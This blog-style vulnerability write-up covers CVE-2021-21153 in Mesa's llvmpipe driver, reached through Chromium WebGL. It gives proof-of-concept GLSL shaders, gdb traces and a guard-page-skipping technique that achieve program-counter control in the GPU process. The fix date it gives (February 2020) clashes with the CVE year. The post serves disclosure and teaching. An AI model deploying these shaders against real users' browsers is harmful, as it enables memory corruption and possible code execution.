In this post, we are discussing a bug we came across in Mesas llvmpipe Gallium3D graphics driver. This bug was accessible through Chromium’s WebGL implementation and can provide control of the program counter (pc) within Chromium’s GPU process if llvmpipe is used. Llvmpipe is a software rasterizer that is used on Linux if no hardware acceleration (graphics card) is available. This is a pretty rare edge case as llvmpipe has no widespread use. An estimate by Google is that approx 0.06% of the Chromium users are affected by this. However, as this is a simple but valid Chromium bug, we want to give you a quick walkthrough. The issue is tracked as CVE-2021-21153 and was fixed in February 2020.
Llvmpipe is a software rasterizer that is used if no graphic card is available. It leverages LLVM to compile the shader to run on the CPU. A shader is a small program that is used e.g., to compute geometry and pixel color values in a 2D/3D scene. This task can be efficiently parallelized. Therefore llvmpipe will leverage AVX (aka Intel vector operations on x86) instructions to compute up to 8 pixel values in parallel within a single thread. A vulnerability in the compilation of the shader source could result in arbitrary code execution as the shader is executed on the CPU. To check if you are using llvmpipe run:
$ glxinfo | grep "OpenGL renderer" OpenGL renderer string: llvmpipe (LLVM 10.0.0, 256 bits)
Arbitrary Stack Allocations using GLSL
Modern browsers ship with a JavaScript extensions called WebGL that are OpenGL bindings for JavaScript to perform 2D/3D rendering. Shaders are implemented in a subset of the OpenGL Shader Langage (GLSL), a C-like language. The limitations of the WebGL shader language are mostly due to security concerns:
- Recursive shader functions are not allowed.
- Array indices must be constant, variables are not allowed.
- Small arrays (<16 elements) might be optimized out.
- Functions that are called once will be inlined.
- Everything that is not needed is optimized out.
A major issue in this implementation was that it was possible to perform arbitrary large allocations on the stack using GLSL if Mesa is used. We can define arrays inside a shader and make them quite large. Those are allocated on the stack, regardless of the stack size of the computing engine. Those shaders can be executed from Chromium using WebGL. An example for such a buggy shader is given in the following:
precision mediump float; void main(void) { int array[0x40000]; gl_FragColor = vec4(float(array[0])); }
This fragment shader can then be compiled using the WebGL JavaScript extension. Running this shader using WebGL within Chromium, we can observe the following crash of Chromium’s GPU process:
llvmpipe-3[3319]: segfault at 7ff275743000 ip 00007ff28407f121 sp 00007ff275742600 error 6
We can get a closer look what is going on when attaching gdb to this:
$ ps aux | grep gpu hammel 3242 [...]/chrome --type=gpu-process [...] $ sudo gdb -q -ex c --pid 3242 [...] Thread 3 "llvmpipe-1" received signal SIGSEGV, Segmentation fault. [Switching to LWP 3317] [----------------------------------registers-----------------------------------] RAX: 0xffb8 RBX: 0xffffffff RCX: 0x0 RDX: 0x0 RSI: 0x20 (' ') RDI: 0x230 RBP: 0x7ff276f44780 --> 0x0 RSP: 0x7ff276744600 --> 0x0 RIP: 0x7ff28407f121 (mov DWORD PTR [rsp+rdi*4+0x140],edx) R8 : 0x7ff276f447f0 --> 0x3f80000000000fc0 R9 : 0x7ff276f44810 --> 0x7ff23d9a1740 --> 0xff00ff00ff00ff00 R10: 0x7ff276744620 --> 0x0 R11: 0x1 R12: 0x1 R13: 0x7ff276f44810 --> 0x7ff23d9a1740 --> 0xff00ff00ff00ff00 R14: 0x7ff276f447f0 --> 0x3f80000000000fc0 R15: 0x0 EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow) [-------------------------------------code-------------------------------------] 0x7ff28407f115: test bl,0x1 0x7ff28407f118: jne 0x7ff28407f121 0x7ff28407f11a: mov edx,DWORD PTR [rsp+rdi*4+0x140] => 0x7ff28407f121: mov DWORD PTR [rsp+rdi*4+0x140],edx 0x7ff28407f128: vpextrd edi,xmm6,0x1 0x7ff28407f12e: vpextrd ebx,xmm5,0x1 0x7ff28407f134: mov edx,0x0 0x7ff28407f139: test bl,0x1 [------------------------------------stack-------------------------------------] 0000| 0x7ff276744600 --> 0x0 0008| 0x7ff276744608 --> 0x0 0016| 0x7ff276744610 --> 0x0 0024| 0x7ff276744618 --> 0x0 0032| 0x7ff276744620 --> 0x0 0040| 0x7ff276744628 --> 0x0 0048| 0x7ff276744630 --> 0xffffffffffffffff 0056| 0x7ff276744638 --> 0xffffffffffffffff [------------------------------------------------------------------------------] Legend: code, data, rodata, value Stopped reason: SIGSEGV 0x00007ff28407f121 in ?? ()
We crash with an out-of-bounds write within the llvmpipe-1 thread. Llvmpipe creates one worker process for each CPU core available. The thread list of the Chromium GPU process looks as follows:
gdb-peda$ info threads Id Target Id Frame 1 LWP 3242 "chrome" 0x00007ff2952d4ad3 in pthread_cond_wait@@[...] 2 LWP 3316 "llvmpipe-0" 0x00007ff28407f121 in ?? () * 3 LWP 3317 "llvmpipe-1" 0x00007ff28407f121 in ?? () 4 LWP 3318 "llvmpipe-2" 0x00007ff28407f121 in ?? () 5 LWP 3319 "llvmpipe-3" 0x00007ff28407f121 in ?? () [...]
If we analyze the RSP register for each llvmpipe thread, we can deduce the following memory layout:
gdb-peda$ vmmap
[...]
0x00007ff274742000 0x00007ff274f42000 rw-p mapped
0x00007ff274f42000 0x00007ff274f43000 ---p mapped
0x00007ff274f43000 0x00007ff275743000 rw-p mapped [stack llvmpipe-3]
0x00007ff275743000 0x00007ff275744000 ---p mapped
0x00007ff275744000 0x00007ff275f44000 rw-p mapped [stack llvmpipe-2]
0x00007ff275f44000 0x00007ff275f45000 ---p mapped
0x00007ff275f45000 0x00007ff276745000 rw-p mapped [stack llvmpipe-1]
0x00007ff276745000 0x00007ff276746000 ---p mapped
0x00007ff276746000 0x00007ff276f46000 rw-p mapped [stack llvmpipe-0]
0x00007ff276f46000 0x00007ff276f47000 ---p mapped
0x00007ff276f47000 0x00007ff277747000 rw-p mapped
The fault address for the llvmpip-3 thread, as shown in dmesg, is 0x7ff275743000. This address is right at the upper boundary of the stack. Therefore we can assume that the thread tries to write sequentially to a huge buffer and crashes, as the buffer is larger than the stack frame. If you have ever wondered why some processes have these memory regions that are neither read-, write- or executable, these are so-called guard pages. Their purpose is exactly this: Prevent us from utilizing a sequential read or write (e.g., buffer overflow) to jump into the next page. If we could use this bug to write arbitrary data to the next stack frame, e.g., another llvmpipe thread, we could also control the return address.
The reason why an out-of-bounds write occurs is not obvious from the shader source above. To understand the reason, we have to know that Chromium’s WebGL implementation does not pass the GLSL source directly to OpenGL. Instead, it is translated before. The translated shader source can be retrieved from JavaScript using gl.getExtension(‘WEBGL_debug_shaders’).getTranslatedShaderSource(shader) and in the case of the shader above the translated one looks as follows:
#version 330 #extension GL_ARB_gpu_shader5 : enable #extension GL_EXT_gpu_shader5 : enable out vec4 webgl_FragColor; void main(){ (webgl_FragColor = vec4(0.0, 0.0, 0.0, 0.0)); int _uarray[262144]; for (int sb5b = 0; (sb5b < 262144); (++sb5b)) { (_uarray[sb5b] = 0); } (webgl_FragColor = vec4(float(_uarray[42]))); }
Now we can explain the crash above. Chromium does not want us to use WebGL to leak random memory, e.g., by using a read on uninitialized stack memory. Therefore every variable including our array is zeroed upon initialization. This exploit mitigation is problematic here for an entirely different reason: We can not simply allocate a large array and overwrite data on the adjacent stack frame. The for loop that clears the memory will cause a segmentation fault as we hit the guard page long before we can do any harm on the next stack frame.
Jumping Over Guard Pages
To turn the bug into something useful, we have to allocate enough memory to jump over the guard pages without writing to them. For this, we can utilize the property that the zeroing of the array is performed upon declaration. Therefore we can declare an array inside of an if-statement, which checks will always evaluate to false. In that case, the zeroing step should not be executed.
void main(void) { int array[0x80]; array[0x18] = 0x1234; gl_FragColor = vec4(float(array[0])); if (int(array[0]) == 42) { int padding[0x40000]; gl_FragColor += vec4(float(padding[42])); } } This shader will translate to the following code. We can see, that the zeroing of the array will never be executed as it is located within the if-statement.
#version 330 #extension GL_ARB_gpu_shader5 : enable #extension GL_EXT_gpu_shader5 : enable out vec4 webgl_FragColor; void main(){ (webgl_FragColor = vec4(0.0, 0.0, 0.0, 0.0)); int _uarray[128]; for (int sb5c = 0; (sb5c < 128); (++sb5c)){ (_uarray[sb5c] = 0); } (_uarray[24] = 4660); (webgl_FragColor = vec4(float(_uarray[0]))); if ((int(_uarray[0]) == 42)){ int _upadding[262144]; for (int sb5d = 0; (sb5d < 262144); (++sb5d)) { (_upadding[sb5d] = 0); } (webgl_FragColor += vec4(float(_upadding[42]))); } } We have to remember is that the allocation of a stack frame is always performed on function entry. The size of the stack frame is never changed during the execution of a single function. As a result, even though the padding array is never needed, it will be allocated on the stack as the shader is executed. If we run that shader, we can observe the following crash in dmesg:
llvmpipe-3[33381]: segfault at 123400001234 ip 0000123400001234 sp 00007ff43ba28790 error 14
By carefully tuning the offsets, we can indeed have partial control over the program counter. But why is the fault address not 0x1234 but 0x123400001234? As mentioned before, llvmpipe utilizes AVX instructions to parallelize the shader within a single thread. Therefore each integer is an array of eight individual 32-bit values. As we use a constant for initialization, all eight individual values have the same value 0x1234.
To gain full pc control, we have to modify the shader a little bit. As I’m not an expert on this, you might have a look at other resources to get more information. For now, I’ll try to explain the basic concept. Until now, we were using the fragment shader to trigger the vulnerability. The fragment shader is responsible for computing the actual pixel color values. Now we also use the vertex shader to draw a line from -1 to 1 on a 2×2 pixel image. The position within this space is passed via an attribute to the vertex shader and will therefore sample the values -0.5 and 0.5.
precision mediump float; attribute float floatAttr; varying float floatVar; void main(void) { gl_Position = vec4(floatAttr, 0.0, 0.0, 1.0); floatVar = floatAttr; }
We use the varying variable floatVar to pass the sampled attribute from the vertex shader to the fragment shader. This can then be used to distinguish two cases within the shader and create the desired pattern in memory to control the upper and lower half of the pc. There is probably an easier and cleaner way to accomplish this. However, it did the job.
varying float floatVar; [...] if(floatVar > 0.) array[0x18] = 0x4344; else array[0x18] = 0x45464748;
When running the proof of concept again with the modified shader, we get the following result in dmesg which shows we have full pc control:
llvmpipe-3[50590]: segfault at 434445464748 ip 0000434445464748 sp 00007f0934bbc850 error 14 in chrome[562d7fe65000+2fc7000]
Conclusion
This indeed is a valid vulnerability that can be used to gain pc control. However, full RCE is a different story. First, the GPU process runs within a sandbox. Therefore and additional vulnerability is required to gain full system control. Second, due to ASLR, an information leak is required. This bug however, does not provide a trivial way of leaking memory as we have to zero the memory before we can read it.
As the bug is already fixed, a vulnerable version can be obtained from here. The proof of concepts are attached to this post and should work on Ubuntu 20.04 (Edit: There were some updates. Visit chrome://gpu and search for GL_RENDERER. Version “ANGLE (VMware, Inc., llvmpipe (LLVM 10.0.0, 256 bits), OpenGL 3.3 core)” and prior should work). To enforce the usage of llvmpipe you can set the following environment variables (thanks Chromium Team). Per default, llvmpipe is only used if no hardware acceleration is available, e.g., in a virtualized environment. Chromium however, will fall back to its own (not vulnerable) SwiftShader if llvmpipe crashes too often. In that case, Chromium has to be restarted.
export LIBGL_ALWAYS_SOFTWARE=1 export GALLIUM_DRIVER=llvmpipe ./chrome